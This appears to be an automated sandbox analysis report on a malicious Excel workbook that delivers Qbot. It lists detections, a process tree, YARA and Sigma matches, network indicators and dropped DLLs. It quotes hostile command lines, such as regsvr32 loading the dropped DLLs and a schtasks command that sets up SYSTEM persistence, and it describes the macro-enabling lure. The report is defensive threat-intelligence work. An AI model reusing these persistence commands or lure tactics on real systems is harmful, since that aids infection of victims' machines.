Windows Analysis Report plan-1053707320.xlsb

Overview

General Information

Sample Name: plan-1053707320.xlsb
Analysis ID: 440113
MD5: 4854b4dcfa441032f2f54bf2834e894f
SHA1: fa24422834d0f6ce6d3e35a8b0f15a906cdf9823
SHA256: 68741c1f5df351dc186805c2c30a79653fd52ce21e2fb2aa34ff0687120343cf

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Schedule system process
Yara detected Qbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to evade analysis by execution special instruction which cause usermode exception
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6964 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 3492 cmdline: regsvr32 ..\gihi1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 5800 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • schtasks.exe (PID: 6572 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • regsvr32.exe (PID: 4864 cmdline: regsvr32 ..\gihi2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 7024 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 6868 cmdline: regsvr32.exe -s 'C:\Users\user\gihi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 7092 cmdline: -s 'C:\Users\user\gihi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 5044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • regsvr32.exe (PID: 5824 cmdline: regsvr32.exe -s 'C:\Users\user\gihi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 6700 cmdline: -s 'C:\Users\user\gihi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Qbot


Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmp | QakBot | QakBot Payload | kevoreilly
  • Strings: 0x13223:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp | QakBot | QakBot Payload | kevoreilly
  • Strings: 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp | QakBot | QakBot Payload | kevoreilly
  • Strings: 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Unpacked PEs

Source | Rule | Description | Author
13.2.explorer.exe.660000.0.raw.unpack | QakBot | QakBot Payload | kevoreilly
  • Strings: 0x13223:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
3.2.regsvr32.exe.10000000.3.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
3.2.regsvr32.exe.10000000.3.unpack | QakBot | QakBot Payload | kevoreilly
  • Strings: 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
6.2.regsvr32.exe.10000000.3.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
6.2.regsvr32.exe.10000000.3.unpack | QakBot | QakBot Payload | kevoreilly
  • Strings: 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: regsvr32 ..\gihi1.dll, CommandLine: regsvr32 ..\gihi1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6964, ProcessCommandLine: regsvr32 ..\gihi1.dll, ProcessId: 3492

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5800, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06, ProcessId: 6572

Signature Overview

AV Detection:

Found malware configuration
Source: 6.2.regsvr32.exe.10000000.3.unpack Malware Configuration Extractor: Qbot
Multi AV Scanner detection for submitted file
Source: plan-1053707320.xlsb Virustotal: Detection: 25%
Source: plan-1053707320.xlsb ReversingLabs: Detection: 28%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm Joe Sandbox ML: detected
Source: C:\Users\user\gihi1.dll Joe Sandbox ML: detected
Source: C:\Users\user\gihi2.dll Joe Sandbox ML: detected
Source: 6.2.regsvr32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 4.2.explorer.exe.1100000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 3.2.regsvr32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 13.2.explorer.exe.660000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown HTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000BB22 FindFirstFileW,FindNextFileW,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\gihi1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\gihi2.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: ka[1].htm.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: global traffic DNS query: name: carpascapital.com
Source: global traffic TCP traffic: 192.168.2.4:49739 -> 50.116.92.246:443
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS traffic detected: queries for: carpascapital.com
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknown | HTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49742 version: TLS 1.2

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: QakBot Payload Author: kevoreilly
          Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: QakBot Payload Author: kevoreilly
          Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: QakBot Payload Author: kevoreilly
          Source: 0000000D.00000002.713096999.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: QakBot Payload Author: kevoreilly
          Source: 13.2.explorer.exe.660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 4.2.explorer.exe.1100000.0.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPE | Matched rule: QakBot Payload Author: kevoreilly
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Screenshot number: 4 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
          Source: Screenshot number: 4 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
          Found Excel 4.0 Macro with suspicious formulas
          Source: plan-1053707320.xlsb | Initial sample: CALL
          Found abnormal large hidden Excel 4.0 Macro sheet
          Source: plan-1053707320.xlsb | Initial sample: Sheet size: 22026
          Office process drops PE file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\gihi1.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\gihi2.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htm
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_1000DDC7 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,memcpy,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_1000E23A memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,FreeLibrary,DeleteFileW,
          Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBG
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652
          Source: gihi2.dll.13.dr | Static PE information: No import functions for PE file found
          Source: gihi1.dll.4.dr | Static PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
          Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
          Source: 00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 0000000D.00000002.713096999.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 13.2.explorer.exe.660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 4.2.explorer.exe.1100000.0.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPE | Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSB@20/19@2/1
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_1000A1C7 CreateToolhelp32Snapshot,memset,Process32First,FindCloseChangeNotification,
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10009CB8 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002297 StartServiceCtrlDispatcherA,
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
          Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{71922192-0266-41D2-A0F0-3628639BB9C8}
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\WERReportingForProcess6700
          Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{264525F5-7A27-4045-91D4-FDDDDA7BFE75}
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\WERReportingForProcess7092
          Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{264525F5-7A27-4045-91D4-FDDDDA7BFE75}
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{EF4E487D-8367-44BE-A024-25DD7810F9BF} - OProcSessId.dat
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: plan-1053707320.xlsb | Virustotal: Detection: 25%
          Source: plan-1053707320.xlsb | ReversingLabs: Detection: 28%
          Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi2.dll
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\gihi1.dll'
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 652
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: plan-1053707320.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.716292885.0000000003244000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942057600.0000000003421000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdbs source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.716161142.000000000323E000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdbH source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdbM source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: gCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.727844501.0000000002E72000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.953457269.0000000000472000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.716177962.000000000324A000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.716155261.0000000003238000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.716161142.000000000323E000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942178479.0000000000840000.00000004.00000001.sdmp
          Source: Binary string: regsvr32.pdb( source: WerFault.exe, 0000000F.00000003.716155261.0000000003238000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942167491.000000000083A000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbT source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdby source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
